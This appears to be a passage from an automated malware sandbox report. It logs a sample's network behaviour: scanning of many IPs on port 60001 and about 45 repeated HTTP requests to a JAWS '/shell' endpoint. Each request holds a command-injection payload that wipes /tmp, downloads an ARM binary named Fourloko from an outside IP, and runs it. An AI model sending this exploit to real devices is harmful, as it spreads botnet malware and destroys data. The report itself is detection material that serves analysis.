    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 118.21.240.176:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 32.32.192.7:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 96.172.88.206:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 46.164.32.50:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 14.7.242.222:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 183.246.192.47:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 217.181.152.36:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 100.231.48.165:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 186.145.60.198:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 184.25.157.100:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 178.103.226.231:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 218.29.199.43:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 14.123.12.230:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 171.193.100.254:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 220.217.74.67:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 98.166.40.3:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 210.100.109.251:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 145.208.215.128:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 104.154.154.35:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 207.118.104.182:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 151.64.251.206:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 139.112.4.200:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 51.47.160.220:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 176.63.176.119:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 119.173.6.123:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 148.80.235.45:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 99.118.20.107:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 209.24.191.130:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 209.218.250.31:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 91.150.180.188:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 205.198.219.70:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 147.137.194.70:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 98.126.177.157:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 103.198.90.21:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 187.176.222.47:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 201.178.68.88:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 143.52.64.34:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 25.246.49.197:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 67.25.38.247:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 83.172.6.247:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 184.16.96.43:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 40.109.172.147:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 75.160.22.114:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 131.23.138.36:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 82.54.156.201:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 49.21.239.14:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 45.211.38.194:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 39.85.5.199:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 208.216.1.55:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 205.250.234.111:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 131.15.5.107:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 111.209.145.118:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 65.189.12.187:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 89.60.63.88:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 107.175.253.27:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 180.245.123.229:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 183.57.158.151:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 104.128.70.119:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 197.127.68.6:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 145.178.9.37:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 99.210.219.137:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 213.193.84.132:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 58.254.82.243:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 27.112.68.201:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 117.184.136.58:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 82.228.21.237:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 66.77.221.176:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 83.244.1.171:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 12.140.105.202:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 153.164.149.74:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 116.90.170.22:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 45.83.241.255:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 140.133.83.0:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 181.69.206.42:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 125.41.220.188:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 190.30.5.246:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 211.59.101.208:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 222.246.195.63:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 83.217.147.190:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 222.41.90.71:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 31.216.232.101:60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
    Source: unknownTCP traffic detected without corresponding DNS query: 186.118.144.241
    Source: unknownTCP traffic detected without corresponding DNS query: 95.161.169.3
    Source: unknownTCP traffic detected without corresponding DNS query: 92.70.119.243
    Source: unknownTCP traffic detected without corresponding DNS query: 161.46.243.82
    Source: unknownTCP traffic detected without corresponding DNS query: 32.225.225.241
    Source: unknownTCP traffic detected without corresponding DNS query: 196.180.244.124
    Source: unknownTCP traffic detected without corresponding DNS query: 174.44.144.58
    Source: unknownTCP traffic detected without corresponding DNS query: 129.57.39.82
    Source: unknownTCP traffic detected without corresponding DNS query: 218.75.52.213
    Source: unknownTCP traffic detected without corresponding DNS query: 94.81.141.191
    Source: unknownTCP traffic detected without corresponding DNS query: 159.134.116.150
    Source: unknownTCP traffic detected without corresponding DNS query: 223.46.43.244
    Source: unknownTCP traffic detected without corresponding DNS query: 146.130.4.81
    Source: unknownTCP traffic detected without corresponding DNS query: 180.103.152.86
    Source: unknownTCP traffic detected without corresponding DNS query: 221.216.112.40
    Source: unknownTCP traffic detected without corresponding DNS query: 169.109.155.26
    Source: unknownTCP traffic detected without corresponding DNS query: 187.235.230.99
    Source: unknownTCP traffic detected without corresponding DNS query: 129.241.178.28
    Source: unknownTCP traffic detected without corresponding DNS query: 94.133.230.108
    Source: unknownTCP traffic detected without corresponding DNS query: 50.57.90.117
    Source: unknownTCP traffic detected without corresponding DNS query: 135.68.189.65
    Source: unknownTCP traffic detected without corresponding DNS query: 196.191.120.68
    Source: unknownTCP traffic detected without corresponding DNS query: 142.149.32.209
    Source: unknownTCP traffic detected without corresponding DNS query: 136.234.129.44
    Source: unknownTCP traffic detected without corresponding DNS query: 179.145.165.149
    Source: unknownTCP traffic detected without corresponding DNS query: 218.183.78.89
    Source: unknownTCP traffic detected without corresponding DNS query: 39.21.179.73
    Source: unknownTCP traffic detected without corresponding DNS query: 73.202.12.93
    Source: unknownTCP traffic detected without corresponding DNS query: 193.112.196.232
    Source: unknownTCP traffic detected without corresponding DNS query: 202.174.158.162
    Source: unknownTCP traffic detected without corresponding DNS query: 135.167.162.253
    Source: unknownTCP traffic detected without corresponding DNS query: 44.193.126.40
    Source: unknownTCP traffic detected without corresponding DNS query: 131.207.90.155
    Source: unknownTCP traffic detected without corresponding DNS query: 71.93.44.28
    Source: unknownTCP traffic detected without corresponding DNS query: 170.216.237.9
    Source: unknownTCP traffic detected without corresponding DNS query: 187.30.82.237
    Source: unknownTCP traffic detected without corresponding DNS query: 23.224.65.86
    Source: unknownTCP traffic detected without corresponding DNS query: 198.206.109.28
    Source: unknownTCP traffic detected without corresponding DNS query: 120.13.77.178
    Source: unknownTCP traffic detected without corresponding DNS query: 109.228.22.34
    Source: unknownTCP traffic detected without corresponding DNS query: 112.101.103.97
    Source: unknownTCP traffic detected without corresponding DNS query: 147.192.60.177
    Source: unknownTCP traffic detected without corresponding DNS query: 82.120.66.187
    Source: unknownTCP traffic detected without corresponding DNS query: 135.29.54.171
    Source: unknownTCP traffic detected without corresponding DNS query: 126.228.13.150
    Source: unknownTCP traffic detected without corresponding DNS query: 77.147.217.125
    Source: unknownTCP traffic detected without corresponding DNS query: 1.226.55.214
    Source: unknownTCP traffic detected without corresponding DNS query: 133.150.192.103
    Source: unknownTCP traffic detected without corresponding DNS query: 170.5.215.105
    Source: unknownTCP traffic detected without corresponding DNS query: 69.124.77.13
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: JAWS/1.0 Jan 21 2017Content-Type: text/html; charset=UTF-8Content-length: 213
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: JAWS/1.0 Sep 18 2018Content-Type: text/html; charset=UTF-8Content-length: 213
    Source: 1xtO9V8ku8String found in binary or memory: http://upx.sf.net
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
